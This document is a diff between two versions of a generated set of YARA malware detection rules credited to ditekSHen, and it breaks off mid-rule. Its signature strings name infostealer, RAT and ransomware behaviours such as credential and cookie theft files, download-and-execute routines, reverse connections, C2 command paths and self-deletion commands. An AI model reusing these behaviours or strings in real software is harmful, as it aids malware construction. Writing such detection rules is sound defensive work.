FILE { meta: - description = "Detects Alfonoso / Shurk / HunterStealer infostealer" + description = "Kinsing RAT payload" author = "ditekSHen" - id = "2766e74e-c13a-5ce4-8f62-de9cc11e3cf0" - date = "2024-09-06" - modified = "2024-09-06" + id = "b13d2c36-c8d3-5138-9e9a-8b5390a93c8d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3609-L3638" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "18e5731ffd70abf2ab70852d54dacc3588dd90cfb4f2ceaee66dfce750535b26" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1361-L1376" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "566eb7d1864e3a8088ad4f5d032d6d62a33080bbfc5c20c2520315cfc8146afc" score = 75 - quality = 50 + quality = 75 tags = "FILE" - snort2_sid = "920102" - snort3_sid = "920100" - clamav_sig = "MALWARE.Win.Trojan.Alfonso" strings: - $s1 = "%s\\etilqs_" fullword ascii - $s2 = "SELECT name, rootpage, sql FROM '%q'.%s" fullword ascii - $s3 = "%s-mj%08X" fullword ascii - $s4 = "| Site:" ascii - $s5 = "| Login:" ascii - $s6 = "| Password:" ascii - $s7 = "| BUILD NAME:" ascii - $s8 = "recursive_directory_iterator" ascii - $s9 = { 2e 7a 69 70 00 00 00 00 2e 7a 6f 6f 00 00 00 00 - 2e 61 72 63 00 00 00 00 2e 6c 7a 68 00 00 00 00 - 2e 61 72 6a 00 00 00 00 2e 67 7a 00 2e 74 67 7a - 00 00 00 00 } - $s10 = "Shurk Steal" fullword ascii - $s11 = ":memory:" fullword ascii - $s12 = "current_path()" fullword ascii - $s13 = "vtab:%p:%p" fullword ascii - $f1 = "chatlog.txt" ascii - $f2 = "servers.fav" ascii - $f3 = "\\USERDATA.DAT" fullword ascii + $s1 = "backconnect" ascii + $s2 = "connectForSocks" ascii + $s3 = "downloadAndExecute" ascii + $s4 = "download_and_exec" ascii + $s5 = "masscan" ascii + $s6 = "UpdateCommand:" ascii + $s7 = "exec_out" ascii + $s8 = "doTask with type %s" ascii condition: - uint16(0)==0x5a4d and (8 of ($s*) or (6 of ($s*) and 2 of ($f*)) or ( all of ($f*) and 5 of ($s*))) + uint16(0)==0x457f and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Vidar : FILE +rule DITEKSHEN_MALWARE_Win_Avaddon : FILE { meta: - description = "Detects Vidar / ArkeiStealer" + description = "Avaddon ransomware payload" author = "ditekSHen" - id = "d858c463-26d7-5f96-ad9a-cb261a8c61c6" - date = "2024-09-06" - modified = "2024-09-06" + id = "d5618c8a-17b7-5009-9947-a6462ad2a4af" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3640-L3650" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c95c8694c05ff0e8d28f098e668a8ae8fa70130e31af6c0e540c4e5596007e41" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1378-L1395" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "fc3032572d2ab2550d3dde738a3d403459da9b5b640acc814596d958b83620bf" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii - $s2 = "screenshot.jpg" fullword wide - $s3 = "Content-Disposition: form-data; name=\"" ascii + $s1 = "\\IMAGEM~1.%d\\VISUA~1\\BIN\\%s.exe" ascii + $s2 = "\\IMAGEM~1.%.2d-\\VISUA~1\\BIN\\%s.exe" ascii + $s3 = "\\IMAGEM~1.%d-Q\\VISUA~1\\BIN\\%s.exe" ascii + $s4 = "\\IMAGEM~1.%d\\%s.exe" ascii + $s5 = "EW6]>mFXDS?YBi?W5] CY 4Z8Y BY7Y BZ8Z CY7Y AY8Z CZ8Y!Y:Z" ascii + $s6 = "FY AY 'Z ;W @Y @Y 'Z Y @Y (Z" ascii + $s7 = "\"rcid\":\"" fullword ascii + $s8 = "\"ip\":\"" fullword ascii wide + $s9 = ".?AUANEventIsGetExternalIP@@" fullword ascii + $s10 = ".?AUANEventGetCpuMax@@" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and 8 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Babuk : FILE +rule DITEKSHEN_MALWARE_Win_Prolock : FILE { meta: - description = "Detects Babuk ransomware" + description = "ProLock ransomware payload" author = "ditekSHen" - id = "6bb7093f-bbef-5b43-b4f9-be72ae4ef319" - date = "2024-09-06" - modified = "2024-09-06" + id = "88fa19ba-238c-5d4d-bf0c-d421ee2ecf1d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3652-L3674" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5ca5c5106747cf8f4ccd5df4ddbc78321fea3c8f533cb807a704d270eb956007" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1397-L1413" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b7d2cc71acc4f643a86781d957afcf5203a2f4034b9ca7da93e8227ddee79f3b" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Ransomware.ProLock" strings: - $s1 = "ecdh_pub_k.bin" wide - $s2 = "How To Restore Your Files.txt" wide - $s3 = /(babuk|babyk)\s(ransomware|locker)/ ascii nocase - $s4 = "/login.php?id=" ascii - $s5 = "http://babuk" ascii - $s6 = "bootsect.bak" fullword wide - $s7 = "Can't open file after killHolder" ascii - $s8 = "Can't OpenProcess" ascii - $s9 = "DoYouWantToHaveSexWithCuongDong" ascii - $arg1 = "-lanfirst" fullword ascii - $arg2 = "-lansecond" fullword ascii - $arg3 = "-nolan" fullword ascii - $arg4 = "shares" fullword wide - $arg5 = "paths" fullword wide - $arg6 = "gdebug" fullword wide + $s1 = ".flat" fullword ascii + $s2 = ".data" fullword ascii + $s3 = ".api" fullword ascii + $s4 = "RtlZeroMemory" fullword ascii + $s5 = "LoadLibraryA" fullword ascii + $s6 = "Sleep" fullword ascii + $s7 = "lstrcatA" fullword ascii + $s8 = { 55 89 E5 8B 45 08 EB 00 89 45 EC 8D 15 4F 10 40 00 8D 05 08 10 40 00 83 E8 08 29 C2 8B 45 EC 01 C2 31 } condition: - uint16(0)==0x5a4d and (3 of ($s*) or (3 of ($arg*) and 2 of ($s*))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Nitol : FILE +rule DITEKSHEN_MALWARE_Win_Purplewave : FILE { meta: - description = "Detects Nitol backdoor" + description = "PurpleWave infostealer payload" author = "ditekSHen" - id = "d545f826-11ff-5d0f-9a95-8232b19d35b6" - date = "2024-09-06" - modified = "2024-09-06" + id = "6f978190-4b4d-5346-9218-0c9104254b45" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3676-L3704" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c0ddcd6179bea2f3af77ae198e07f55f62884e07a975623ae41bcec163060f89" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1415-L1432" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "98dca005d2fdf7eea89661e162292451b544847a7f8b63c8c25c82241ec8e04a" score = 75 - quality = 73 + quality = 25 tags = "FILE" strings: - $s1 = "%$#@!.aspGET ^&*().htmlGET" ascii - $s2 = "Applications\\iexplore.exe\\shell\\open\\command" fullword ascii - $s3 = "taskkill /f /im rundll32.exe" fullword ascii - $s4 = "\\Tencent\\Users\\*.*" fullword ascii - $s5 = "[Pause Break]" fullword ascii - $s6 = ":]%d-%d-%d %d:%d:%d" fullword ascii - $s7 = "GET %s HTTP/1.1" fullword ascii - $s8 = "GET %s%s HTTP/1.1" fullword ascii - $s9 = "Accept-Language: zh-cn" fullword ascii - $s10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)" fullword ascii - $s11 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii - $s12 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii - $w1 = ".aspGET" ascii - $w2 = ".htmGET" ascii - $w3 = ".htmlGET" ascii - $domain = "www.xy999.com" fullword ascii - $v2_1 = "loglass" fullword ascii - $v2_2 = "rlehgs" fullword ascii - $v2_3 = "eherrali" fullword ascii - $v2_4 = "agesrlu" fullword ascii - $v2_5 = "lepejagas" fullword ascii + $s1 = "/loader/" fullword ascii + $s2 = "\\load_" fullword wide + $s3 = "boundaryaswell" fullword ascii + $s4 = "[passwords]" ascii + $s5 = "[is_encrypted]" ascii + $s6 = "[cookies]" ascii + $s7 = ".?AVMozillaBrowser@@" fullword ascii + $s8 = ".?AVChromeBrowser@@" fullword ascii + $s9 = ".?AV?$money" ascii + $s10 = "at t.me/LuckyStoreSupport" ascii condition: - uint16(0)==0x5a4d and (5 of ($s*) or ( all of ($v2*)) or ($domain and 3 of them ) or (#w1>2 and #w2>2 and #w3>2 and 3 of ($s*))) + uint16(0)==0x5a4d and 7 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Strongpity : FILE +rule DITEKSHEN_MALWARE_Java_Pyrogenic { meta: - description = "Detects StrongPity" + description = "Pyrogenic/Qealler infostealer payload" author = "ditekSHen" - id = "9dcc5edb-5c86-5412-af63-f88d488d5829" - date = "2024-09-06" - modified = "2024-09-06" + id = "2b9268f0-2f73-51ad-ab72-9289e42e5bb1" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3706-L3720" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e92147966cd68152eb536b805c4918462f72f64280d1b3df800bb41266aa232f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1434-L1446" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bb8cb939f06a376f72dcbbb1f04ec34526f72c3bcc3b146b905a8466826d2c24" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = "Boundary%08X" ascii wide - $s2 = "Content-Disposition: form-data; name=\"file\";" fullword ascii - $s3 = "%sfilename=\"%ls\"" fullword ascii - $s4 = "name=%ls&delete=" fullword ascii - $s5 = "Content-Type: application/octet-stream" fullword ascii - $s6 = "cmd.exe /C ping" wide - $s7 = "& rmdir /Q /S \"" wide + $s1 = "bbb6fec5ebef0d93" ascii wide + $s2 = "2a898bc98aaf6c96f2054bb1eadc9848eb77633039e9e9ffd833184ce553fe9b" ascii wide + $s3 = "addShutdownHook" ascii wide + $s4 = "obfuscated/META-INF/QeallerV" ascii wide + $s5 = "globalIpAddress" ascii wide condition: - uint16(0)==0x5a4d and 5 of them + all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Jssloader : FILE +rule DITEKSHEN_MALWARE_Win_Agentteslav3 : FILE { meta: - description = "Detects JSSLoader RAT/backdoor" + description = "AgentTeslaV3 infostealer payload" author = "ditekSHen" - id = "ef710c21-5c64-513e-b882-b5768478976e" - date = "2024-09-06" - modified = "2024-09-06" + id = "c44c69dd-5e95-595c-88c7-89e243648198" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3722-L3752" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "91764dabfb40cb51914110de229ddb00cd565078fef83c825f7a86fa502fda37" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1448-L1481" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6c62b2f601eba3c83b60f7f6dbd3d0ec3c01af30f4312df897bb5e902c36fdac" score = 75 quality = 73 tags = "FILE" strings: - $cmd1 = "Cmd_UPDATE" fullword ascii - $cmd2 = "Cmd_IDLE" fullword ascii - $cmd3 = "Cmd_EXE" fullword ascii - $cmd4 = "Cmd_VBS" fullword ascii - $cmd5 = "Cmd_JS" fullword ascii - $cmd6 = "Cmd_PWS" fullword ascii - $cmd7 = "Cmd_RAT" fullword ascii - $cmd8 = "Cmd_UNINST" fullword ascii - $cmd9 = "Cmd_RunDll" fullword ascii - $s1 = "ANSWER_OK" fullword ascii - $s2 = "GatherDFiles" ascii - $s3 = "CommandCd" fullword ascii - $s4 = "URL_GetCmd" fullword ascii - $s5 = "\"host\": \"{0}\", \"domain\": \"{1}\", \"user\": \"{2}\"" wide - $s6 = "pc_dns_host_name" wide - $s7 = "\"adinfo\": { \"adinformation\":" wide - $e1 = "//e:vbscript" wide - $e2 = "//e:jscript" wide - $e3 = "/c rundll32.exe" wide - $e4 = "/C powershell" wide - $e5 = "C:\\Windows\\System32\\cmd.exe" wide - $e6 = "echo del /f" wide - $e7 = "AT.U() {0}. format" wide + $s1 = "get_kbok" fullword ascii + $s2 = "get_CHoo" fullword ascii + $s3 = "set_passwordIsSet" fullword ascii + $s4 = "get_enableLog" fullword ascii + $s5 = "bot%telegramapi%" wide + $s6 = "KillTorProcess" fullword ascii + $s7 = "GetMozilla" ascii + $s8 = "torbrowser" wide + $s9 = "%chatid%" wide + $s10 = "logins" fullword wide + $s11 = "credential" fullword wide + $s12 = "AccountConfiguration+" wide + $s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide + $g1 = "get_Clipboard" fullword ascii + $g2 = "get_Keyboard" fullword ascii + $g3 = "get_Password" fullword ascii + $g4 = "get_CtrlKeyDown" fullword ascii + $g5 = "get_ShiftKeyDown" fullword ascii + $g6 = "get_AltKeyDown" fullword ascii + $m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii + $m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii + $m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii + $m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii + $m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii condition: - uint16(0)==0x5a4d and (5 of ($cmd*) or 5 of ($s*) or all of ($e*) or 7 of them ) + ( uint16(0)==0x5a4d and (8 of ($s*) or (6 of ($*) and all of ($g*)))) or (2 of ($m*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_CHUWI_Seth : FILE +rule DITEKSHEN_MALWARE_Win_Taurus : FILE { meta: - description = "First sighting on 2020-01-05 didn't include ransomware artificats. Second sighting on 2020-01-24 with several correlations between the two samples now include ransomware artifacts." + description = "Taurus infostealer payload" author = "ditekSHen" - id = "62af3cd3-59c3-580b-9d66-71fd4acfaf17" - date = "2024-09-06" - modified = "2024-09-06" + id = "c02114c1-9c97-5d0c-b7ce-1bd6a00a9e9a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3754-L3801" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e6e3f5e9af093268667f67fec2176a943b35721e9f220804e176c6b5a3bb24e1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1483-L1519" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6039c27e69b47dfcc1327c34306627d2d9bd57f6bd365bb80b47ad21f892ae8a" score = 75 quality = 73 tags = "FILE" - snort2_sid = "920103-920105" - snort3_sid = "920101-920103" strings: - $cmd1 = "shell_command" fullword ascii - $cmd2 = "check_command" fullword ascii - $cmd3 = "down_exec" fullword ascii - $cmd4 = "open_link" fullword ascii - $cmd5 = "down_exec" fullword ascii - $cmd6 = "exe_link" fullword ascii - $cmd7 = "shellCommand" fullword ascii - $cmd8 = "R_CMMAND" fullword ascii - $cnc1 = "/check_command.php?HWID=" ascii - $cnc2 = "&act=get_command" ascii - $cnc3 = "/get_command.php?hwid=" ascii - $cnc4 = "&command=down_exec" ascii - $cnc5 = "&command=message" ascii - $cnc6 = "&command=open_link" ascii - $cnc7 = "&command=down_exec" ascii - $cnc8 = "&command=shell" ascii - $pdb = "\\Users\\CHUWI\\Documents\\CPROJ\\Downloader\\svchost" ascii - $rcnc1 = "inc/check_command.php" ascii - $rcnc2 = "inc/get_command.php" ascii - $rcnc3 = "php?btc" ascii - $rcnc4 = "php?hwid" ascii - $x1 = "> %USERPROFILE%\\Desktop\\HOW_DECRYPT_FILES.seth.txt" ascii - $x2 = "/C dir /b %USERPROFILE%\\Documents > %temp%\\doc.txt" ascii - $x3 = "/C dir /b %USERPROFILE%\\Desktop > %temp%\\desk.txt" ascii - $x4 = "/C dir /b %USERPROFILE%\\Downloads > %temp%\\downs.txt" ascii - $x5 = "/C dir /b %USERPROFILE%\\Pictures > %temp%\\pics.txt" ascii - $x6 = "for /F \"delims=\" %%a in ('mshta.exe \"%~F0\"') do set \"HTA=%%a\"" ascii - $x7 = "\\svchost.exe" fullword ascii - $x8 = ".seth" fullword ascii - $x9 = "MyAgent" fullword ascii + $s1 = "t.me/taurus_se" ascii + $s2 = "rus_seller@explo" ascii + $s3 = "/c timeout /t 3 & del /f /q" ascii + $s4 = "MyAwesomePrefix" ascii + $txt1 = "LogInfo.txt" fullword ascii + $txt2 = "Information.txt" fullword ascii + $txt3 = "General\\passwords.txt" fullword ascii + $txt4 = "General\\forms.txt" fullword ascii + $txt5 = "General\\cards.txt" fullword ascii + $txt6 = "Installed Software.txt" fullword ascii + $txt7 = "Crypto Wallets\\WalletInfo.txt" fullword ascii + $txt8 = "cookies.txt" fullword ascii + $url1 = "/cfg/" wide + $url2 = "/loader/complete/" wide + $url3 = "/log/" wide + $url4 = "/dlls/" wide + $upat = /\.exe;;;\d;\d;\d\]\|\[http/ + $x1 = "Vaultcli.dll" fullword ascii + $x2 = "Bcrypt.dll" fullword ascii + $x3 = "*.localstor" ascii + $x4 = "operator<=>" fullword ascii + $x5 = ".data$rs" fullword ascii + $x6 = "https_discordap" ascii + $o1 = { 53 56 8b 75 08 8d 85 64 ff ff ff 57 6a ff 6a 01 } + $o2 = { 6a 00 68 00 04 00 00 ff b5 a8 fe ff ff ff b5 ac } + $o3 = { ff 75 0c 8d 85 44 ff ff ff 50 e8 aa f7 ff ff 8b } + $o4 = { 8b 47 04 c6 40 19 01 8d 85 6c ff ff ff 8b 0f 50 } + $o5 = { 8d 8d ?? ff ff ff e8 5b } condition: - uint16(0)==0x5a4d and ($pdb or 5 of ($cmd*) or 4 of ($cnc*) or all of ($rcnc*) or 5 of ($x*) or 8 of them ) + ((3 of ($s*) or (6 of ($txt*) and 2 of ($s*)) or ($upat and 1 of ($s*) and 2 of ($txt*)) or ( all of ($url*) and (2 of ($txt*) or 1 of ($s*)))) or ( uint16(0)==0x5a4d and all of ($x*) or ( all of ($o*) and 3 of ($x*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Gulpix : FILE +rule DITEKSHEN_MALWARE_Win_Remoteutilitiesrat : FILE { meta: - description = "Detects Gulpix/HyperPlus backddor" + description = "RemoteUtilitiesRAT RAT payload" author = "ditekSHen" - id = "b3dfd1d9-42fe-57d4-8047-135103689be7" - date = "2024-09-06" - modified = "2024-09-06" + id = "1cf3ece1-e723-5302-9673-273381ba7a8b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3803-L3832" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5026726f093b31b444fc934ac1446b6c25f182b8714a37da05f4498f32a9a65f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1521-L1537" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "179a559f6a6ffbce31595bd613d338bb6ac40b8a083ed0169cde754b6ed756c7" score = 75 - quality = 50 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.RemoteUtilitiesRAT" strings: - $x1 = "MainServer.dll" fullword ascii - $x2 = "NvSmartMax.dat" fullword wide - $x3 = "NvSmartMax.dll" fullword wide - $x4 = "http://+:80/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7/" fullword wide - $s1 = "IP retriever" fullword wide - $s2 = "\\cmd.exe" fullword wide - $s3 = "\\msnetwork-cache.db" fullword wide - $s4 = "http://+:" wide - $s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" fullword wide - $s6 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii - $s7 = "Got a unknown request for %ws" wide - $s8 = "HttpReceiveRequestEntityBody failed with %lu" wide - $s9 = "FD873AC4-CF86-4FED-84EC-4BD59C6F17A7" wide + $s1 = "rman_message" wide + $s2 = "rms_invitation" wide + $s3 = "rms_host_" wide + $s4 = "rman_av_capture_settings" wide + $s5 = "rman_registry_key" wide + $s6 = "rms_system_information" wide + $s7 = "_rms_log.txt" wide + $s8 = "rms_internet_id_settings" wide condition: - uint16(0)==0x5a4d and ( all of ($x*) or 6 of ($s*) or (2 of ($x*) and 4 of ($s*)) or (2 of them and pe.exports("daemon") and pe.exports("run") and pe.exports("session") and pe.exports("work"))) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Linux_Ransomexx : FILE +rule DITEKSHEN_MALWARE_Win_Slothfulmedia : FILE { meta: - description = "Detects RansomEXX ransomware" - author = "ditekshen" - id = "b449afc7-9055-55ed-a876-316d1aea8fee" - date = "2024-09-06" - modified = "2024-09-06" + description = "SlothfulMedia backdoor payload" + author = "ditekSHen" + id = "e94b6d67-137c-5cfb-9c59-fbeb6cd85f0a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3834-L3858" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c233ccc3e741cb2c53f182c48093e41595a82a3f4e5bdb1dc0204f1f57b96c2a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1539-L1565" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6f742e8d9d555b44daaa09835f599c99e16cd39bb106c8f43fbbca7093de462e" score = 75 - quality = 75 + quality = 73 tags = "FILE" - clamav_sig = "MALWARE.Linux.Ransomware.RansomEXX" strings: - $c1 = "crtstuff.c" fullword ascii - $c2 = "cryptor.c" fullword ascii - $c3 = "ransomware.c" fullword ascii - $c4 = "logic.c" fullword ascii - $c5 = "enum_files.c" fullword ascii - $c6 = "readme.c" fullword ascii - $c7 = "ctr_drbg.c" fullword ascii - $s1 = "regenerate_pre_data" fullword ascii - $s2 = "g_RansomHeader" fullword ascii - $s3 = "CryptOneBlock" fullword ascii - $s4 = "RansomLogic" fullword ascii - $s5 = "CryptOneFile" fullword ascii - $s6 = "encrypt_worker" fullword ascii - $s7 = "list_dir" fullword ascii - $s8 = "ctr_drbg_update_internal" fullword ascii + $x1 = /ExtKeylogger(Start|Stop)/ fullword ascii + $x2 = /ExtService(Add|Delete|Start|Stop)/ fullword ascii + $x3 = /ExtRegKey(Add|Del)/ fullword ascii + $x4 = /ExtRegItem(Add|Del)/ fullword ascii + $x5 = "ExtUnload" fullword ascii + $s1 = "Local Security Process" fullword wide + $s2 = "Global%s%d" fullword wide + $s3 = "%s%s_%d.dat" fullword wide + $s4 = "\\AppIni" fullword wide + $s5 = "%s.tmp" fullword wide + $s6 = "\\SetupUi" fullword wide + $s7 = "%s|%s|%s|%s" fullword wide + $s8 = "\\ExtInfo" fullword wide + $cnc1 = "/v?m=" fullword ascii + $cnc2 = "%s&i=%d" fullword ascii + $cnc3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" fullword ascii + $cnc4 = "Content-Length: %d" fullword ascii condition: - uint16(0)==0x457f and (5 of ($c*) or 6 of ($s*) or (3 of ($c*) and 3 of ($s*))) + uint16(0)==0x5a4d and (3 of ($x*) or 7 of ($s*) or all of ($cnc*) or (1 of ($x*) and 4 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Trickbotmodule : FILE +rule DITEKSHEN_MALWARE_Win_Ircbot : FILE { meta: - description = "Detects Trickbot modules" - author = "ditekshen" - id = "c56c664f-5928-5e2e-ab06-0b9d504981be" - date = "2024-09-06" - modified = "2024-09-06" + description = "IRCBot payload" + author = "ditekSHen" + id = "69739d82-9760-5c4e-bf9e-60c60617a12a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3860-L3881" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4d06653dad5f8a18598855212548364b3c3d2b68b99784846b494fcb1d1c8df9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1567-L1596" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1ea640202cfbd0c3425a192c45938f632dc644f41c7974118e7491b026122818" score = 75 - quality = 75 + quality = 67 tags = "FILE" strings: - $mc = "<moduleconfig>" ascii - $s1 = "<autostart>" ascii - $s2 = "<nohead>" ascii - $s3 = "<needinfo" ascii - $s4 = "<conf ctl" ascii - $s5 = "<limit>" ascii - $w1 = "<sys>yes</sys>" ascii - $w2 = "<sys>no</sys>" ascii - $w3 = "<autostart>yes</autostart>" ascii - $w4 = "<autostart>no</autostart>" ascii - $w5 = "<nohead>yes</nohead>" ascii - $w6 = "<nohead>no</nohead>" ascii - $w7 = /<limit>\d+<\/limit>/ ascii - $w8 = "<moduleconfig> </moduleconfig" ascii + $s1 = ".okuninstall" fullword wide + $s2 = ".oksnapshot" fullword wide + $s3 = "\\uspread.vbs" fullword wide + $s4 = "KEYLogger" ascii nocase + $s5 = "GetKeyLogs" fullword ascii + $s6 = "GetLoocationInfo" fullword ascii + $s7 = "CaputerScreenshot" fullword ascii + $s8 = "get_SCRIPT_DATA" fullword ascii + $s9 = /irc_(server|nickname|password|channle)/ fullword ascii + $s10 = "machine_screenshot" fullword ascii + $s11 = "CollectPassword" fullword ascii + $s12 = "USBInfection" fullword ascii nocase + $cnc1 = "&command=UpdateAndGetTasks&machine_id=" wide + $cnc2 = "&machine_os=1&privateip=" wide + $cnc3 = "&command=InsertTaskExecution&excuter_id=" wide + $cnc4 = "&command=RegisterNewMachine" wide + $cnc5 = "&command=UpdateNewMachine" wide + $cnc6 = "&command=GetPayloads&keys=" wide + $cnc7 = "&command=SaveSnapshot" wide + $pdb = 